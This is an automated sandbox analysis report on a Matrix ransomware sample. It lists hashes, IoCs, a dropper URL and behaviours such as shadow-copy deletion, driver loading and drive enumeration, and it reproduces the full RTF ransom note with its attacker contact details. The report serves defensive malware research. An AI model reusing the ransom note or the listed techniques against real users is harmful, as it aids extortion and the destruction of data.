matrix | 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

Analysis

max time kernel
150s
max time network
122s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
13-07-2023 23:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Size

1.2MB
MD5

76b640aa00354e46b29ca7ac2adfd732
SHA1

afebf9d72ba7186afefebf4deda87675621b0b8b
SHA256

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7
SHA512

fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552
SSDEEP

24576:l/SA+2lraRrjSJR5ezmT1dM9tZBrPyvaNn:zXlabPyyN

Score

10^/10

matrix discovery persistence ransomware upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#FOX_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 3E7A64A8E819EB47\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 3E7A64A8E819EB47\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 fU6hAOhB\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\lib\zi\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\lib\fonts\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\lua\modules\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Library\Analysis\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\Admin\Documents\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\All Users\Package Cache\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}v12.0.40660\packages\vcRuntimeMinimum_x86\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Indiana\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\lua\meta\art\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Kentucky\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\lib\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\bin\server\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\Admin\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\lib\zi\Atlantic\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Notebook Templates\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\Public\Videos\Sample Videos\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Users\All Users\Microsoft\OFFICE\UICaptions\1036\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 2028 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

vzDEJ12q64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS vzDEJ12q64.exe

flow	pid	process
7	2028	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	vzDEJ12q64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

vzDEJ12q64.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	vzDEJ12q64.exe

Executes dropped EXE 3 IoCs

Processes:

NWxX9xnj.exevzDEJ12q.exevzDEJ12q64.exe

pid process

2920 NWxX9xnj.exe
2064 vzDEJ12q.exe
2588 vzDEJ12q64.exe

pid	process
2920	NWxX9xnj.exe
2064	vzDEJ12q.exe
2588	vzDEJ12q64.exe

Loads dropped DLL 4 IoCs

Processes:

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.execmd.exevzDEJ12q.exe

pid	process
3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
3068	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
3164	cmd.exe
2064	vzDEJ12q.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exe

pid process

1340 takeown.exe

pid	process
1340	takeown.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\vzDEJ12q.exe	upx
\Users\Admin\AppData\Local\Temp\vzDEJ12q.exe	upx
C:\Users\Admin\AppData\Local\Temp\vzDEJ12q.exe	upx
behavioral1/memory/3164-2063-0x0000000000260000-0x00000000002D7000-memory.dmp	upx
behavioral1/memory/2064-10685-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exevzDEJ12q64.exe

description	ioc	process
File opened (read-only)	\??\T:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\S:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\R:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\P:	vzDEJ12q64.exe
File opened (read-only)	\??\O:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\J:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\H:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\E:	vzDEJ12q64.exe
File opened (read-only)	\??\H:	vzDEJ12q64.exe
File opened (read-only)	\??\U:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\Q:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\M:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\I:	vzDEJ12q64.exe
File opened (read-only)	\??\W:	vzDEJ12q64.exe
File opened (read-only)	\??\X:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\W:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\V:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\N:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\M:	vzDEJ12q64.exe
File opened (read-only)	\??\R:	vzDEJ12q64.exe
